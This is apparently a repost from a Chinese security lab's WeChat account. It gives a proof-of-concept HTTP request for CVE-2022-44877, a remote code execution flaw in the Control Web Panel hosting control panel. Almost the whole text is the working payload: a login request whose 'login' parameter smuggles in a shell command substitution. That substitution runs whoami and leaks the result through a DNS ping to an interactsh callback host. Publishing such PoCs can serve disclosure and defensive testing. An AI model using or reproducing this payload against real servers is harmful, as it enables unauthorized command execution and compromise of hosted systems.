POC:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
原文始发于微信公众号(Khan安全攻防实验室):Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877